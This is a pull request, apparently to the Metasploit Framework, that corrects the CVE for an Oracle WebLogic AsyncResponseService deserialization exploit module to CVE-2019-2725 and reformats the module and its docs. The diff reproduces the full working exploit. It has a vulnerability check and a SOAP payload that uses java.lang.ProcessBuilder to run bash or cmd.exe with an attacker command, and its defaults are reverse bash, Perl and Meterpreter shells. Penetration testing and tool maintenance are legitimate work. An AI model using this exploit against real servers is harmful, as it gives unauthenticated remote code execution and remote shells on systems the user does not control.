### PR TITLE
correct CVE and add linting for weblogic_deserialize_asyncresponseservice

### DIFF
--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md
@@ -1,8 +1,14 @@
 ## Vulnerable Application
 
-CVE-2017-10271 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component.  The exploit provides an unauthenticated attacker with remote arbitrary command execution.
+CVE-2019-2725 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component.
+The exploit provides an unauthenticated attacker with remote arbitrary command execution.
 
-Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments.  It is downloadable from Oracle once registered for an account.  For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (`wls1036_linux32.bin`), Weblogic 10.3.6 for Windows (`wls1036_dev.zip`).  For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (`fmw_12.2.1.2.0_wls.jar`) in combination with a JDK (`jdk-8u211-windows-x64.exe`).
+Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments.
+It is downloadable from Oracle once registered for an account.
+For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (`wls1036_linux32.bin`),
+Weblogic 10.3.6 for Windows (`wls1036_dev.zip`).
+For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (`fmw_12.2.1.2.0_wls.jar`)
+in combination with a JDK (`jdk-8u211-windows-x64.exe`).
 
 ## Verification Steps
 
@@ -13,7 +19,10 @@ Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environ
   3. When prompted, use a development environment instead of a production environment.
   4. When prompted, keep the default port of TCP/7001.
   5. When prompted, provide a username and password, and make a note of them.
-  6. Upon completion of the installer, find and execute the admin server.  On Windows: `C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd`.  On Linux: `~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh`
+  6. Upon completion of the installer, find and execute the admin server.
+  On Windows:
+  `C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd`.
+  On Linux: `~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh`
   7. You may be prompted for the username and password you generated during the install process.
   8. Wait for the output: `<Server state changed to RUNNING.>`
 
@@ -39,7 +48,8 @@ msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
 
 ## Options
 
-  **TARGETURI** : Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`. You can also set `VHOST` instead to handle virtual hosts.
+  **TARGETURI** : Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`.
+  You can also set `VHOST` instead to handle virtual hosts.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md
@@ -48,8 +48,8 @@ msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
 
 ## Options
 
-  **TARGETURI** : Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`.
-  You can also set `VHOST` instead to handle virtual hosts.
+### TARGETURI
+Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`.
 
 ## Scenarios
 

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2019-04-23',
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],
-          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'SideEffects' => [ IOC_IN_LOGS ],
           'Reliability' => [ REPEATABLE_SESSION ]
         }
       )

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -9,62 +9,76 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Powershell
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
-      'Description' => %q{
-        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
-        interface can send a malicious SOAP request to the interface WLS AsyncResponseService
-        to execute code on the vulnerable host.
-      },
-      'Author' =>
-        [
-        'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>',  # Metasploit Module
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
+        'Description' => %q{
+          An unauthenticated attacker with network access to the Oracle Weblogic Server T3
+          interface can send a malicious SOAP request to the interface WLS AsyncResponseService
+          to execute code on the vulnerable host.
+        },
+        'Author' => [
+          'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module
         ],
-      'License' => MSF_LICENSE,
-      'References' =>
-        [
-          ['CVE', '2017-10271'],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2019-2725'],
           ['CNVD-C', '2019-48814'],
           ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],
           ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'],
           ['URL', 'https://twitter.com/F5Labs/status/1120822404568244224']
         ],
-      'Privileged' => false,
-      'Platform' => %w{ unix win solaris },
-      'Targets' =>
-        [
-          [ 'Unix',
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
+        'Privileged' => false,
+        'Platform' => %w[unix win solaris],
+        'Targets' => [
+          [
+            'Unix',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
           ],
-          [ 'Windows',
-            'Platform' => 'win',
-            'Arch' => [ARCH_X64, ARCH_X86],
-            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
+          [
+            'Windows',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
+            }
           ],
-          [ 'Solaris',
-            'Platform' => 'solaris',
-            'Arch' => ARCH_CMD,
-            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
-            'Payload' => {
-              'Space'       => 2048,
-              'DisableNops' => true,
-              'Compat'      =>
+          [
+            'Solaris',
+            {
+              'Platform' => 'solaris',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },
+              'Payload' => {
+                'Space' => 2048,
+                'DisableNops' => true,
+                'Compat' =>
                 {
                   'PayloadType' => 'cmd',
-                  'RequiredCmd' => 'generic perl telnet',
+                  'RequiredCmd' => 'generic perl telnet'
                 }
+              }
             }
           ]
         ],
-      'DefaultTarget' => 0,
-      'DefaultOptions' =>
-        {
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
           'WfsDelay' => 12
         },
-      'DisclosureDate' => '2019-04-23'))
+        'DisclosureDate' => '2019-04-23',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
 
     register_options(
       [
@@ -76,21 +90,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi(
-      'uri'      => normalize_uri(target_uri.path),
-      'method'   => 'POST',
-      'ctype'    => 'text/xml',
-      'headers'  => {'SOAPAction' => '' }
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'ctype' => 'text/xml',
+      'headers' => { 'SOAPAction' => '' }
     )
 
-    if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>")
+    if res && res.code == 500 && res.body.include?('<faultcode>env:Client</faultcode>')
       vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")
       vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")
       Exploit::CheckCode::Vulnerable
     elsif res && res.code != 202
-      vprint_status("The target returned a non-vulnerable HTTP code")
+      vprint_status('The target returned a non-vulnerable HTTP code')
       Exploit::CheckCode::Safe
     elsif res.nil?
-      vprint_status("The target did not respond in an expected way")
+      vprint_status('The target did not respond in an expected way')
       Exploit::CheckCode::Unknown
     else
       vprint_status("The target returned HTTP code: #{res.code}")
@@ -100,13 +114,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("Generating payload...")
+    print_status('Generating payload...')
     case target.name
     when 'Windows'
       string0_cmd = 'cmd.exe'
       string1_param = '/c'
-      shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
-    when 'Unix','Solaris'
+      shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true, encoded: false })
+    when 'Unix', 'Solaris'
       string0_cmd = '/bin/bash'
       string1_param = '-c'
       shell_payload = payload.encoded
@@ -115,53 +129,53 @@ class MetasploitModule < Msf::Exploit::Remote
     random_action = rand_text_alphanumeric(20)
     random_relates = rand_text_alphanumeric(20)
 
-    soap_payload =  %Q|<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"|
-    soap_payload <<   %Q|xmlns:wsa="http://www.w3.org/2005/08/addressing"|
-    soap_payload <<   %Q|xmlns:asy="http://www.bea.com/async/AsyncResponseService">|
-    soap_payload <<   %Q|<soapenv:Header>|
-    soap_payload <<     %Q|<wsa:Action>#{random_action}</wsa:Action>|
-    soap_payload <<     %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|
-    soap_payload <<     %Q|<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">|
-    soap_payload <<       %Q|<void class="java.lang.ProcessBuilder">|
-    soap_payload <<         %Q|<array class="java.lang.String" length="3">|
-    soap_payload <<           %Q|<void index="0">|
-    soap_payload <<             %Q|<string>#{string0_cmd}</string>|
-    soap_payload <<           %Q|</void>|
-    soap_payload <<           %Q|<void index="1">|
-    soap_payload <<             %Q|<string>#{string1_param}</string>|
-    soap_payload <<           %Q|</void>|
-    soap_payload <<           %Q|<void index="2">|
-    soap_payload <<             %Q|<string>#{shell_payload.encode(xml: :text)}</string>|
-   #soap_payload <<             %Q|<string>#{xml_encode(shell_payload)}</string>|
-    soap_payload <<           %Q|</void>|
-    soap_payload <<         %Q|</array>|
-    soap_payload <<       %Q|<void method="start"/>|
-    soap_payload <<       %Q|</void>|
-    soap_payload <<     %Q|</work:WorkContext>|
-    soap_payload <<   %Q|</soapenv:Header>|
-    soap_payload <<   %Q|<soapenv:Body>|
-    soap_payload <<     %Q|<asy:onAsyncDelivery/>|
-    soap_payload <<   %Q|</soapenv:Body>|
-    soap_payload << %Q|</soapenv:Envelope>|
+    soap_payload = %(<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/")
+    soap_payload << %(xmlns:wsa="http://www.w3.org/2005/08/addressing")
+    soap_payload << %(xmlns:asy="http://www.bea.com/async/AsyncResponseService">)
+    soap_payload << %(<soapenv:Header>)
+    soap_payload << %(<wsa:Action>#{random_action}</wsa:Action>)
+    soap_payload << %(<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>)
+    soap_payload << %(<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">)
+    soap_payload << %(<void class="java.lang.ProcessBuilder">)
+    soap_payload << %(<array class="java.lang.String" length="3">)
+    soap_payload << %(<void index="0">)
+    soap_payload << %(<string>#{string0_cmd}</string>)
+    soap_payload << %(</void>)
+    soap_payload << %(<void index="1">)
+    soap_payload << %(<string>#{string1_param}</string>)
+    soap_payload << %(</void>)
+    soap_payload << %(<void index="2">)
+    soap_payload << %(<string>#{shell_payload.encode(xml: :text)}</string>)
+    # soap_payload <<             %Q|<string>#{xml_encode(shell_payload)}</string>|
+    soap_payload << %(</void>)
+    soap_payload << %(</array>)
+    soap_payload << %(<void method="start"/>)
+    soap_payload << %(</void>)
+    soap_payload << %(</work:WorkContext>)
+    soap_payload << %(</soapenv:Header>)
+    soap_payload << %(<soapenv:Body>)
+    soap_payload << %(<asy:onAsyncDelivery/>)
+    soap_payload << %(</soapenv:Body>)
+    soap_payload << %(</soapenv:Envelope>)
 
-    print_status("Sending payload...")
+    print_status('Sending payload...')
 
     begin
       res = send_request_cgi(
-        'uri'      => normalize_uri(target_uri.path),
-        'method'   => 'POST',
-        'ctype'    => 'text/xml',
-        'data'     => soap_payload,
-        'headers'  => {'SOAPAction' => '' }
+        'uri' => normalize_uri(target_uri.path),
+        'method' => 'POST',
+        'ctype' => 'text/xml',
+        'data' => soap_payload,
+        'headers' => { 'SOAPAction' => '' }
       )
     rescue Errno::ENOTCONN
-      fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
+      fail_with(Failure::Disconnected, 'The target forcibly closed the connection, and is likely not vulnerable.')
     end
 
     if res.nil?
-      fail_with(Failure::Unreachable, "No response from host")
+      fail_with(Failure::Unreachable, 'No response from host')
     elsif res && res.code != 202
-      fail_with(Failure::UnexpectedReply,"Exploit failed.  Host did not responded with HTTP code #{res.code} instead of HTTP code 202")
+      fail_with(Failure::UnexpectedReply, "Exploit failed.  Host did not responded with HTTP code #{res.code} instead of HTTP code 202")
     end
   end
 end


### PR DESCRIPTION
# About
This change changes the CVE number for weblogic_deserialize_asyncresponseservice from `CVE-2017-10271` to `CVE-2019-2725` in the module and docs. It also add linting for the module and docs. The correct CVE number was already mentioned in the URL for the Oracle security advisory: `['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'],`